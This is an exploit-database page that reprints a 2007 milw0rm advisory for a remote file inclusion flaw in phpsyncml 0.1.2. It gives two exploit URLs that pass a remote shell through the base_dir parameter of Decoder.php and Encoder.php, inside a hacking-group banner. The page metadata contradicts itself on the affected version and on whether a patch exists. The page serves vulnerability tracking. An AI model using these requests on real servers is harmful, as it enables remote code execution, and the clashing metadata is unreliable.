phpsyncml - exploit.company

vendor:

phpsyncml

by:

S.W.A.T.

7.5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: phpsyncml

Affected Version From: 2000.1.2

Affected Version To: 2000.1.2

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

Unknown

phpsyncml <= 0.1.2 Remote File Include Vulnerability

The vulnerability exists in phpsyncml version 0.1.2. Attackers can exploit this vulnerability by including remote files in the 'base_dir' parameter in the Decoder.php and Encoder.php files located in the wbxml/WBXML directory of the target application.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a newer version of phpsyncml that has patched this vulnerability.

Source

Exploit-DB raw data:

========================================================================
||  ##    ##   ##           ##########   #######     ########         ||
||   ##  ##    ##########   ##########   ##   ##     ##               ||
||    ####     ##########   ##      ##   #######     ########         ||
||    ####     ##  ##  ##   ##      ##   #######           ##         ||
||   ##  ##    ##  ##  ##   ##########   ##    ##          ##         ||
||  ##    ##   ##  ##  ##   ##########   ##     ##   ########         ||
========================================================================
========================================================================
[*] phpsyncml <= 0.1.2   Remote File Include Vulnerability            ||
[!] Application homepage :                                            ||
kent.dl.sourceforge.net/sourceforge/phpsyncml/phpsyncml-0.1.2.tar.bz2 ||
[!] Author               :  S.W.A.T.                                  ||
[!] Site                 :  wWw.XmorS.CoM                             ||
[!] Y!ID                 :  Svvateam                                  ||
[!] E-Mail               :  S.W.4.T@hackermail.CoM                    ||
[!] Location             :  Iran - 071                                ||
[!] Risk                 :  Moderate ( High )                         ||
[!] Dork                 :   :(                                       ||
========================================================================
========================================================================
Vuln. code: wbxml/WBXML/Decoder.php & Encoder.php	              ||
                                                                      ||
========================================================================
[*] Exploitation :                                                    ||
                                                                      ||
[target]/[path]/wbxml/WBXML/Decoder.php?base_dir=[Shell]              ||
[target]/[path]/wbxml/WBXML/Encoder.php?base_dir=[Shell]              ||
========================================================================
[!] We Are : Scorpiunix - Kamy4r - S.W.A.T. - D3vil_B0Y_Ir -          ||
[!] The_Editor - Silliconic - Sh3llH3ll                               ||
                                                                      ||
[!] I Love Xmors & All Member Of Them                                 ||
							              ||
[!] DeltaHackingGroup = ( Lammers Group :D ) ,,!,,                    ||
							              ||
[!] Special Thanks To : Dj7xpl From Y! UnderGround Group              ||
								      ||
[!] Tnx 2 : Str0ke - Google - SourceForge                             ||
========================================================================
# Xmors.Com [2007-09-18]

# milw0rm.com [2007-09-18]